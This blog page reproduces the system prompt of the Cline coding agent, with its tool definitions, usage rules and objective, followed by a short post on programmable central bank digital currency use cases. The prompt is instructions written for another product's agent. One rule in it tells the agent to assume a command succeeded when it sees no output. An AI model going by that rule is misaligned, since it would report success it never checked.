<p><a target="_blank" rel="noopener" href="https://github.com/cline/cline/blob/main/src/core/prompts/system.ts">https://github.com/cline/cline/blob/main/src/core/prompts/system.ts</a><br>IDE 中的自主编码代理-Autonomous coding agent,能够在每一步中在您的许可下创建/编辑文件、执行命令、使用浏览器等。Autonomous coding agent core prompts are here:</p>
<h2 id="Who-you-are"><a href="#Who-you-are" class="headerlink" title="Who you are"></a>Who you are</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">You are Cline, a highly skilled software engineer with extensive knowledge in many programming languages, frameworks, design patterns, and best practices.</span><br></pre></td></tr></table></figure>
<h2 id="execute-command"><a href="#execute-command" class="headerlink" title="execute_command"></a>execute_command</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">Description: Request to execute a CLI command on the system. Use this when you need to perform system operations or run specific commands to accomplish any step in the user's task. You must tailor your command to the user's system and provide a clear explanation of what the command does. Prefer to execute complex CLI commands over creating executable scripts, as they are more flexible and easier to run. Commands will be executed in the current working directory: ${cwd.toPosix()}</span><br><span class="line">Parameters:</span><br><span class="line">- command: (required) The CLI command to execute. This should be valid for the current operating system. Ensure the command is properly formatted and does not contain any harmful instructions.</span><br></pre></td></tr></table></figure>
<h2 id="read-file"><a href="#read-file" class="headerlink" title="read_file"></a>read_file</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">Description: Request to read the contents of a file at the specified path. Use this when you need to examine the contents of an existing file you do not know the contents of, for example to analyze code, review text files, or extract information from configuration files. Automatically extracts raw text from PDF and DOCX files. May not be suitable for other types of binary files, as it returns the raw content as a string.</span><br><span class="line">Parameters:</span><br><span class="line">- path: (required) The path of the file to read (relative to the current working directory ${cwd.toPosix()})</span><br></pre></td></tr></table></figure>
<h2 id="write-to-file"><a href="#write-to-file" class="headerlink" title="write_to_file"></a>write_to_file</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">Description: Request to write content to a file at the specified path. If the file exists, it will be overwritten with the provided content. If the file doesn't exist, it will be created. This tool will automatically create any directories needed to write the file.</span><br><span class="line">Parameters:</span><br><span class="line">- path: (required) The path of the file to write to (relative to the current working directory ${cwd.toPosix()})</span><br><span class="line">- content: (required) The content to write to the file. ALWAYS provide the COMPLETE intended content of the file, without any truncation or omissions. You MUST include ALL parts of the file, even if they haven't been modified.</span><br></pre></td></tr></table></figure>
<h2 id="search-files"><a href="#search-files" class="headerlink" title="search_files"></a>search_files</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">Description: Request to perform a regex search across files in a specified directory, providing context-rich results. This tool searches for patterns or specific content across multiple files, displaying each match with encapsulating context.</span><br><span class="line">Parameters:</span><br><span class="line">- path: (required) The path of the directory to search in (relative to the current working directory ${cwd.toPosix()}). This directory will be recursively searched.</span><br><span class="line">- regex: (required) The regular expression pattern to search for. Uses Rust regex syntax.</span><br><span class="line">- file_pattern: (optional) Glob pattern to filter files (e.g., '*.ts' for TypeScript files). If not provided, it will search all files (*).</span><br></pre></td></tr></table></figure>
<h2 id="list-files"><a href="#list-files" class="headerlink" title="list_files"></a>list_files</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">Description: Request to list files and directories within the specified directory. If recursive is true, it will list all files and directories recursively. If recursive is false or not provided, it will only list the top-level contents. Do not use this tool to confirm the existence of files you may have created, as the user will let you know if the files were created successfully or not.</span><br><span class="line">Parameters:</span><br><span class="line">- path: (required) The path of the directory to list contents for (relative to the current working directory ${cwd.toPosix()})</span><br><span class="line">- recursive: (optional) Whether to list files recursively. Use true for recursive listing, false or omit for top-level only.</span><br></pre></td></tr></table></figure>
<h2 id="list-code-definition-names"><a href="#list-code-definition-names" class="headerlink" title="list_code_definition_names"></a>list_code_definition_names</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">Description: Request to list definition names (classes, functions, methods, etc.) used in source code files at the top level of the specified directory. This tool provides insights into the codebase structure and important constructs, encapsulating high-level concepts and relationships that are crucial for understanding the overall architecture.</span><br><span class="line">Parameters:</span><br><span class="line">- path: (required) The path of the directory (relative to the current working directory ${cwd.toPosix()}) to list top level source code definitions for.</span><br></pre></td></tr></table></figure>
<h2 id="browser-action"><a href="#browser-action" class="headerlink" title="browser_action"></a>browser_action</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">Description: Request to interact with a Puppeteer-controlled browser. Every action, except \`close\`, will be responded to with a screenshot of the browser's current state, along with any new console logs. You may only perform one browser action per message, and wait for the user's response including a screenshot and logs to determine the next action.</span><br><span class="line">-The sequence of actions **must always start with** launching the browser at a URL, and **must always end with** closing the browser. If you need to visit a new URL that is not possible to navigate to from the current webpage, you must first close the browser, then launch again at the new URL.</span><br><span class="line">-While the browser is active, only the \`browser_action\` tool can be used. No other tools should be called during this time. You may proceed to use other tools only after closing the browser. 
For example if you run into an error and need to fix a file, you must close the browser, then use other tools to make the necessary changes, then re-launch the browser to verify the result.</span><br><span class="line">-The browser window has a resolution of **900x600** pixels. When performing any click actions, ensure the coordinates are within this resolution range.</span><br><span class="line">-Before clicking on any elements such as icons, links, or buttons, you must consult the provided screenshot of the page to determine the coordinates of the element. The click should be targeted at the **center of the element**, not on its edges.</span><br><span class="line">Parameters:</span><br><span class="line">-action: (required) The action to perform. The available actions are:</span><br><span class="line"> * launch: Launch a new Puppeteer-controlled browser instance at the specified URL. This **must always be the first action**.</span><br><span class="line"> - Use with the \`url\` parameter to provide the URL.</span><br><span class="line"> - Ensure the URL is valid and includes the appropriate protocol (e.g. http://localhost:3000/page, file:///path/to/file.html, etc.)</span><br><span class="line"> * click: Click at a specific x,y coordinate.</span><br><span class="line"> - Use with the \`coordinate\` parameter to specify the location.</span><br><span class="line"> - Always click in the center of an element (icon, button, link, etc.) based on coordinates derived from a screenshot.</span><br><span class="line"> * type: Type a string of text on the keyboard. You might use this after clicking on a text field to input text.</span><br><span class="line"> - Use with the \`text\` parameter to provide the string to type.</span><br><span class="line"> * scroll_down: Scroll down the page by one page height.</span><br><span class="line"> * scroll_up: Scroll up the page by one page height.</span><br><span class="line"> * close: Close the Puppeteer-controlled browser instance. 
This **must always be the final browser action**.</span><br><span class="line"> - Example: \`<action>close</action>\`</span><br><span class="line">-url: (optional) Use this for providing the URL for the \`launch\` action.</span><br><span class="line"> * Example: <url>https://example.com</url></span><br><span class="line">-coordinate: (optional) The X and Y coordinates for the \`click\` action. Coordinates should be within the **900x600** resolution.</span><br><span class="line"> * Example: <coordinate>450,300</coordinate></span><br><span class="line">-text: (optional) Use this for providing the text for the \`type\` action.</span><br><span class="line"> * Example: <text>Hello, world!</text></span><br></pre></td></tr></table></figure>
<h2 id="ask-followup-question"><a href="#ask-followup-question" class="headerlink" title="ask_followup_question"></a>ask_followup_question</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">Description: Ask the user a question to gather additional information needed to complete the task. This tool should be used when you encounter ambiguities, need clarification, or require more details to proceed effectively. It allows for interactive problem-solving by enabling direct communication with the user. Use this tool judiciously to maintain a balance between gathering necessary information and avoiding excessive back-and-forth.</span><br><span class="line">Parameters:</span><br><span class="line">- question: (required) The question to ask the user. This should be a clear, specific question that addresses the information you need.</span><br><span class="line">Usage:</span><br><span class="line"><ask_followup_question></span><br><span class="line"><question>Your question here</question></span><br><span class="line"></ask_followup_question></span><br></pre></td></tr></table></figure>
<h2 id="attempt-completion"><a href="#attempt-completion" class="headerlink" title="attempt_completion"></a>attempt_completion</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line">Description: After each tool use, the user will respond with the result of that tool use, i.e. if it succeeded or failed, along with any reasons for failure. Once you've received the results of tool uses and can confirm that the task is complete, use this tool to present the result of your work to the user. Optionally you may provide a CLI command to showcase the result of your work. 
The user may respond with feedback if they are not satisfied with the result, which you can use to make improvements and try again.</span><br><span class="line">IMPORTANT NOTE: This tool CANNOT be used until you've confirmed from the user that any previous tool uses were successful. Failure to do so will result in code corruption and system failure. Before using this tool, you must ask yourself in <thinking></thinking> tags if you've confirmed from the user that any previous tool uses were successful. If not, then DO NOT use this tool.</span><br><span class="line">Parameters:</span><br><span class="line">- result: (required) The result of the task. Formulate this result in a way that is final and does not require further input from the user. Don't end your result with questions or offers for further assistance.</span><br><span class="line">- command: (optional) A CLI command to execute to show a live demo of the result to the user. For example, use \`open index.html\` to display a created html website, or \`open localhost:3000\` to display a locally running development server. But DO NOT use commands like \`echo\` or \`cat\` that merely print text. This command should be valid for the current operating system. 
Ensure the command is properly formatted and does not contain any harmful instructions.</span><br><span class="line"></span><br><span class="line"># Tool Use Examples</span><br><span class="line"></span><br><span class="line">## Example 1: Requesting to execute a command</span><br><span class="line"></span><br><span class="line"><execute_command></span><br><span class="line"><command>npm run dev</command></span><br><span class="line"></execute_command></span><br><span class="line"></span><br><span class="line">## Example 2: Requesting to write to a file</span><br><span class="line"></span><br><span class="line"><write_to_file></span><br><span class="line"><path>frontend-config.json</path></span><br><span class="line"><content></span><br><span class="line">{</span><br><span class="line"> "apiEndpoint": "https://api.example.com",</span><br><span class="line"> "theme": {</span><br><span class="line"> "primaryColor": "#007bff",</span><br><span class="line"> "secondaryColor": "#6c757d",</span><br><span class="line"> "fontFamily": "Arial, sans-serif"</span><br><span class="line"> },</span><br><span class="line"> "features": {</span><br><span class="line"> "darkMode": true,</span><br><span class="line"> "notifications": true,</span><br><span class="line"> "analytics": false</span><br><span class="line"> },</span><br><span class="line"> "version": "1.0.0"</span><br><span class="line">}</span><br><span class="line"></content></span><br><span class="line"></write_to_file></span><br></pre></td></tr></table></figure>
<h1 id="Tool-Use-Guidelines"><a href="#Tool-Use-Guidelines" class="headerlink" title="Tool Use Guidelines"></a>Tool Use Guidelines</h1><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">1. In <thinking> tags, assess what information you already have and what information you need to proceed with the task.</span><br><span class="line">2. Choose the most appropriate tool based on the task and the tool descriptions provided. Assess if you need additional information to proceed, and which of the available tools would be most effective for gathering this information. For example using the list_files tool is more effective than running a command like \`ls\` in the terminal. It's critical that you think about each available tool and use the one that best fits the current step in the task.</span><br><span class="line">3. If multiple actions are needed, use one tool at a time per message to accomplish the task iteratively, with each tool use being informed by the result of the previous tool use. Do not assume the outcome of any tool use. Each step must be informed by the previous step's result.</span><br><span class="line">4. Formulate your tool use using the XML format specified for each tool.</span><br><span class="line">5. After each tool use, the user will respond with the result of that tool use. 
This result will provide you with the necessary information to continue your task or make further decisions. This response may include:</span><br><span class="line"> - Information about whether the tool succeeded or failed, along with any reasons for failure.</span><br><span class="line"> - Linter errors that may have arisen due to the changes you made, which you'll need to address.</span><br><span class="line"> - New terminal output in reaction to the changes, which you may need to consider or act upon.</span><br><span class="line"> - Any other relevant feedback or information related to the tool use.</span><br><span class="line">6. ALWAYS wait for user confirmation after each tool use before proceeding. Never assume the success of a tool use without explicit confirmation of the result from the user.</span><br><span class="line"></span><br><span class="line">It is crucial to proceed step-by-step, waiting for the user's message after each tool use before moving forward with the task. This approach allows you to:</span><br><span class="line">1. Confirm the success of each step before proceeding.</span><br><span class="line">2. Address any issues or errors that arise immediately.</span><br><span class="line">3. Adapt your approach based on new information or unexpected results.</span><br><span class="line">4. Ensure that each action builds correctly on the previous ones.</span><br><span class="line"></span><br><span class="line">By waiting for and carefully considering the user's response after each tool use, you can react accordingly and make informed decisions about how to proceed with the task. This iterative process helps ensure the overall success and accuracy of your work.</span><br></pre></td></tr></table></figure>
<h2 id="CAPABILITIES"><a href="#CAPABILITIES" class="headerlink" title="CAPABILITIES"></a>CAPABILITIES</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">-You have access to tools that let you execute CLI commands on the user's computer, list files, view source code definitions, regex search${</span><br><span class="line"> supportsComputerUse ? ", use the browser" : ""</span><br><span class="line">}, read and write files, and ask follow-up questions. These tools help you effectively accomplish a wide range of tasks, such as writing code, making edits or improvements to existing files, understanding the current state of a project, performing system operations, and much more.</span><br><span class="line">- When the user initially gives you a task, a recursive list of all filepaths in the current working directory ('${cwd.toPosix()}') will be included in environment_details. This provides an overview of the project's file structure, offering key insights into the project from directory/file names (how developers conceptualize and organize their code) and file extensions (the language used). This can also guide decision-making on which files to explore further. If you need to further explore directories such as outside the current working directory, you can use the list_files tool. If you pass 'true' for the recursive parameter, it will list files recursively. 
Otherwise, it will list files at the top level, which is better suited for generic directories where you don't necessarily need the nested structure, like the Desktop.</span><br><span class="line">- You can use search_files to perform regex searches across files in a specified directory, outputting context-rich results that include surrounding lines. This is particularly useful for understanding code patterns, finding specific implementations, or identifying areas that need refactoring.</span><br><span class="line">- You can use the list_code_definition_names tool to get an overview of source code definitions for all files at the top level of a specified directory. This can be particularly useful when you need to understand the broader context and relationships between certain parts of the code. You may need to call this tool multiple times to understand various parts of the codebase related to the task.</span><br><span class="line"> - For example, when asked to make edits or improvements you might analyze the file structure in the initial environment_details to get an overview of the project, then use list_code_definition_names to get further insight using source code definitions for files located in relevant directories, then read_file to examine the contents of relevant files, analyze the code and suggest improvements or make necessary edits, then use the write_to_file tool to implement changes. If you refactored code that could affect other parts of the codebase, you could use search_files to ensure you update other files as needed.</span><br><span class="line">- You can use the execute_command tool to run commands on the user's computer whenever you feel it can help accomplish the user's task. When you need to execute a CLI command, you must provide a clear explanation of what the command does. Prefer to execute complex CLI commands over creating executable scripts, since they are more flexible and easier to run. 
Interactive and long-running commands are allowed, since the commands are run in the user's VSCode terminal. The user may keep commands running in the background and you will be kept updated on their status along the way. Each command you execute is run in a new terminal instance.${</span><br><span class="line"> supportsComputerUse</span><br><span class="line"> ? "\n- You can use the browser_action tool to interact with websites (including html files and locally running development servers) through a Puppeteer-controlled browser when you feel it is necessary in accomplishing the user's task. This tool is particularly useful for web development tasks as it allows you to launch a browser, navigate to pages, interact with elements through clicks and keyboard input, and capture the results through screenshots and console logs. This tool may be useful at key stages of web development tasks-such as after implementing new features, making substantial changes, when troubleshooting issues, or to verify the result of your work. You can analyze the provided screenshots to ensure correct rendering or identify errors, and review console logs for runtime issues.\n - For example, if asked to add a component to a react website, you might create the necessary files, use execute_command to run the site locally, then use browser_action to launch the browser, navigate to the local server, and verify the component renders & functions correctly before closing the browser."</span><br><span class="line"> : ""</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<h2 id="RULES"><a href="#RULES" class="headerlink" title="RULES"></a>RULES</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line">- Your current working directory is: ${cwd.toPosix()}</span><br><span class="line">- You cannot \`cd\` into a different directory to complete a task. You are stuck operating from '${cwd.toPosix()}', so be sure to pass in the correct 'path' parameter when using tools that require a path.</span><br><span class="line">- Do not use the ~ character or $HOME to refer to the home directory.</span><br><span class="line">- Before using the execute_command tool, you must first think about the SYSTEM INFORMATION context provided to understand the user's environment and tailor your commands to ensure they are compatible with their system. 
You must also consider if the command you need to run should be executed in a specific directory outside of the current working directory '${cwd.toPosix()}', and if so prepend with \`cd\`'ing into that directory && then executing the command (as one command since you are stuck operating from '${cwd.toPosix()}'). For example, if you needed to run \`npm install\` in a project outside of '${cwd.toPosix()}', you would need to prepend with a \`cd\` i.e. pseudocode for this would be \`cd (path to project) && (command, in this case npm install)\`.</span><br><span class="line">- When using the search_files tool, craft your regex patterns carefully to balance specificity and flexibility. Based on the user's task you may use it to find code patterns, TODO comments, function definitions, or any text-based information across the project. The results include context, so analyze the surrounding code to better understand the matches. Leverage the search_files tool in combination with other tools for more comprehensive analysis. For example, use it to find specific code patterns, then use read_file to examine the full context of interesting matches before using write_to_file to make informed changes.</span><br><span class="line">- When creating a new project (such as an app, website, or any software project), organize all new files within a dedicated project directory unless the user specifies otherwise. Use appropriate file paths when writing files, as the write_to_file tool will automatically create any necessary directories. Structure the project logically, adhering to best practices for the specific type of project being created. Unless otherwise specified, new projects should be easily run without additional setup, for example most projects can be built in HTML, CSS, and JavaScript - which you can open in a browser.</span><br><span class="line">- Be sure to consider the type of project (e.g. 
Python, JavaScript, web application) when determining the appropriate structure and files to include. Also consider what files may be most relevant to accomplishing the task, for example looking at a project's manifest file would help you understand the project's dependencies, which you could incorporate into any code you write.</span><br><span class="line">- When making changes to code, always consider the context in which the code is being used. Ensure that your changes are compatible with the existing codebase and that they follow the project's coding standards and best practices.</span><br><span class="line">- When you want to modify a file, use the write_to_file tool directly with the desired content. You do not need to display the content before using the tool.</span><br><span class="line">- Do not ask for more information than necessary. Use the tools provided to accomplish the user's request efficiently and effectively. When you've completed your task, you must use the attempt_completion tool to present the result to the user. The user may provide feedback, which you can use to make improvements and try again.</span><br><span class="line">- You are only allowed to ask the user questions using the ask_followup_question tool. Use this tool only when you need additional details to complete a task, and be sure to use a clear and concise question that will help you move forward with the task. However if you can use the available tools to avoid having to ask the user questions, you should do so. For example, if the user mentions a file that may be in an outside directory like the Desktop, you should use the list_files tool to list the files in the Desktop and check if the file they are talking about is there, rather than asking the user to provide the file path themselves.</span><br><span class="line">- When executing commands, if you don't see the expected output, assume the terminal executed the command successfully and proceed with the task. 
The user's terminal may be unable to stream the output back properly. If you absolutely need to see the actual terminal output, use the ask_followup_question tool to request the user to copy and paste it back to you.</span><br><span class="line">- The user may provide a file's contents directly in their message, in which case you shouldn't use the read_file tool to get the file contents again since you already have it.</span><br><span class="line">- Your goal is to try to accomplish the user's task, NOT engage in a back and forth conversation.${</span><br><span class="line"> supportsComputerUse</span><br><span class="line"> ? '\n- The user may ask generic non-development tasks, such as "what\'s the latest news" or "look up the weather in San Diego", in which case you might use the browser_action tool to complete the task if it makes sense to do so, rather than trying to create a website or using curl to answer the question.'</span><br><span class="line"> : ""</span><br><span class="line">}</span><br><span class="line">- NEVER end attempt_completion result with a question or request to engage in further conversation! Formulate the end of your result in a way that is final and does not require further input from the user.</span><br><span class="line">- You are STRICTLY FORBIDDEN from starting your messages with "Great", "Certainly", "Okay", "Sure". You should NOT be conversational in your responses, but rather direct and to the point. For example you should NOT say "Great, I've updated the CSS" but instead something like "I've updated the CSS". It is important you be clear and technical in your messages.</span><br><span class="line">- When presented with images, utilize your vision capabilities to thoroughly examine them and extract meaningful information. Incorporate these insights into your thought process as you accomplish the user's task.</span><br><span class="line">- At the end of each user message, you will automatically receive environment_details. 
This information is not written by the user themselves, but is auto-generated to provide potentially relevant context about the project structure and environment. While this information can be valuable for understanding the project context, do not treat it as a direct part of the user's request or response. Use it to inform your actions and decisions, but don't assume the user is explicitly asking about or referring to this information unless they clearly do so in their message. When using environment_details, explain your actions clearly to ensure the user understands, as they may not be aware of these details.</span><br><span class="line">- Before executing commands, check the "Actively Running Terminals" section in environment_details. If present, consider how these active processes might impact your task. For example, if a local development server is already running, you wouldn't need to start it again. If no active terminals are listed, proceed with command execution as normal.</span><br><span class="line">- When using the write_to_file tool, ALWAYS provide the COMPLETE file content in your response. This is NON-NEGOTIABLE. Partial updates or placeholders like '// rest of code unchanged' are STRICTLY FORBIDDEN. You MUST include ALL parts of the file, even if they haven't been modified. Failure to do so will result in incomplete or broken code, severely impacting the user's project.</span><br><span class="line">- It is critical you wait for the user's response after each tool use, in order to confirm the success of the tool use. For example, if asked to make a todo app, you would create a file, wait for the user's response it was created successfully, then create another file if needed, wait for the user's response it was created successfully, etc.${</span><br><span class="line"> supportsComputerUse</span><br><span class="line"> ? 
" Then if you want to test your work, you might use browser_action to launch the site, wait for the user's response confirming the site was launched along with a screenshot, then perhaps e.g., click a button to test functionality if needed, wait for the user's response confirming the button was clicked along with a screenshot of the new state, before finally closing the browser."</span><br><span class="line"> : ""</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>OBJECTIVE</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">You accomplish a given task iteratively, breaking it down into clear steps and working through them methodically.</span><br><span class="line"></span><br><span class="line">1. Analyze the user's task and set clear, achievable goals to accomplish it. Prioritize these goals in a logical order.</span><br><span class="line">2. Work through these goals sequentially, utilizing available tools one at a time as necessary. Each goal should correspond to a distinct step in your problem-solving process. You will be informed on the work completed and what's remaining as you go.</span><br><span class="line">3. Remember, you have extensive capabilities with access to a wide range of tools that can be used in powerful and clever ways as necessary to accomplish each goal. Before calling a tool, do some analysis within <thinking></thinking> tags. First, analyze the file structure provided in environment_details to gain context and insights for proceeding effectively. Then, think about which of the provided tools is the most relevant tool to accomplish the user's task. Next, go through each of the required parameters of the relevant tool and determine if the user has directly provided or given enough information to infer a value. When deciding if the parameter can be inferred, carefully consider all the context to see if it supports a specific value. If all of the required parameters are present or can be reasonably inferred, close the thinking tag and proceed with the tool use. 
BUT, if one of the values for a required parameter is missing, DO NOT invoke the tool (not even with fillers for the missing params) and instead, ask the user to provide the missing parameters using the ask_followup_question tool. DO NOT ask for more information on optional parameters if it is not provided.</span><br><span class="line">4. Once you've completed the user's task, you must use the attempt_completion tool to present the result of the task to the user. You may also provide a CLI command to showcase the result of your task; this can be particularly useful for web development tasks, where you can run e.g. \`open index.html\` to show the website you've built.</span><br><span class="line">5. The user may provide feedback, which you can use to make improvements and try again. But DO NOT continue in pointless back and forth conversations, i.e. don't end your responses with questions or offers for further assistance.`</span><br><span class="line"></span><br><span class="line">export function addCustomInstructions(customInstructions: string): string {</span><br><span class="line"> return `</span><br></pre></td></tr></table></figure>
</div>
<footer class="post-footer">
<div class="post-eof"></div>
</footer>
</article>
</div>
<div class="post-block">
<article itemscope itemtype="http://schema.org/Article" class="post-content" lang="">
<link itemprop="mainEntityOfPage" href="https://zhuang-weiming.github.io/2024/11/11/%E5%A4%AE%E8%A1%8C%E6%95%B0%E5%AD%97%E8%B4%A7%E5%B8%81%E7%9A%84%E5%8F%AF%E7%BC%96%E7%A8%8B%E6%80%A7%E5%88%B0%E5%BA%95%E5%8F%AF%E4%BB%A5%E5%81%9A%E4%BB%80%E4%B9%88/">
<span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
<meta itemprop="image" content="/images/avatar.gif">
<meta itemprop="name" content="Weiming Zhuang">
<meta itemprop="description" content="">
</span>
<span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
<meta itemprop="name" content="Zhuang's Diary">
</span>
<header class="post-header">
<h2 class="post-title" itemprop="name headline">
<a href="/2024/11/11/%E5%A4%AE%E8%A1%8C%E6%95%B0%E5%AD%97%E8%B4%A7%E5%B8%81%E7%9A%84%E5%8F%AF%E7%BC%96%E7%A8%8B%E6%80%A7%E5%88%B0%E5%BA%95%E5%8F%AF%E4%BB%A5%E5%81%9A%E4%BB%80%E4%B9%88/" class="post-title-link" itemprop="url">央行数字货币的可编程性到底可以做什么</a>
</h2>
<div class="post-meta-container">
<div class="post-meta">
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-calendar"></i>
</span>
<span class="post-meta-item-text">Posted on</span>
<time title="Created: 2024-11-11 11:11:00" itemprop="dateCreated datePublished" datetime="2024-11-11T11:11:00+08:00">2024-11-11</time>
</span>
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-calendar-check"></i>
</span>
<span class="post-meta-item-text">Edited on</span>
<time title="Modified: 2024-11-21 22:51:03" itemprop="dateModified" datetime="2024-11-21T22:51:03+08:00">2024-11-21</time>
</span>
</div>
</div>
</header>
<div class="post-body" itemprop="articleBody">
<p>Programmability in the context of Central Bank Digital Currencies (CBDCs) refers to the capacity to embed smart contract-like features directly into the digital currency. This would allow CBDCs to automatically execute rules or conditions when specific criteria are met, enabling more advanced use cases and controls.<br>Here are some practical <strong>business cases</strong> where the programmability of CBDCs could have significant impact:</p>
<p><strong>1. Supply Chain Finance and Trade Settlement</strong><br>供应链金融和贸易结算<br>In supply chain finance, CBDCs could be programmed to release payments automatically at each stage of production or delivery. For example:<br>• <em>Smart Contracts for Automatic Payment</em>: A CBDC could be programmed to release funds when a shipment reaches a specific location or when an IoT-enabled device confirms the delivery of goods.<br>• <em>International Trade Compliance</em>: By incorporating compliance checks within the CBDC, customs duties and taxes could be deducted automatically, while ensuring adherence to trade regulations, improving speed, and reducing paperwork.</p>
<p><strong>2. Conditional Government Aid and Welfare Programs</strong><br>有条件的政府援助和福利计划<br>Governments can disburse funds directly through programmable CBDCs with built-in conditions for usage. This use case would:<br>• <em>Ensure Targeted Spending</em>: Welfare payments could be restricted to authorized merchants or for specific categories (e.g., groceries, health services), reducing misuse and ensuring assistance reaches the intended recipients.<br>• <em>Automatic Expiration or Limits</em>: To encourage timely spending, certain stimulus payments could have expiration dates or be programmed to prevent hoarding, boosting economic activity.</p>
<p><strong>3. Automated Tax Collection for Businesses and Consumers</strong><br>企业和消费者自动征税<br>For businesses, CBDCs can simplify tax compliance through automated deductions:<br>• <em>Real-Time Tax Deduction</em>: Taxes could be deducted in real-time during each transaction, simplifying tax compliance and reducing the administrative burden for small businesses.<br>• <em>VAT and Sales Tax</em>: CBDCs could automatically calculate and remit VAT or sales tax directly to government accounts, reducing errors and ensuring compliance.</p>
<p><strong>4. Real Estate and Asset Tokenization</strong><br>房地产和资产代币化<br>Programmable CBDCs can streamline large, complex transactions like real estate purchases:<br>• <em>Escrow Mechanisms for Property Sales</em>: CBDCs can serve as programmable escrow funds, where funds are only released when all contractual conditions, like title transfer or inspections, are fulfilled.<br>• <em>Fractional Ownership and Dividends</em>: Asset tokenization (e.g., in real estate) could enable CBDCs to automatically distribute dividends to token holders, representing fractional property ownership.</p>
<p><strong>5. Cross-Border Trade and Remittances</strong><br>跨境贸易和汇款<br>CBDCs can simplify cross-border payments by integrating automatic conversion and compliance features:<br>• <em>Instant Cross-Currency Settlement</em>: Programmable CBDCs could automatically convert funds to the recipient’s currency, applying relevant fees or exchange rates instantly.<br>• <em>Compliance Checks for AML/KYC</em>: Programmable CBDCs could enforce AML/KYC requirements by automatically flagging suspicious activity, reducing regulatory risk and speeding up international transactions.</p>
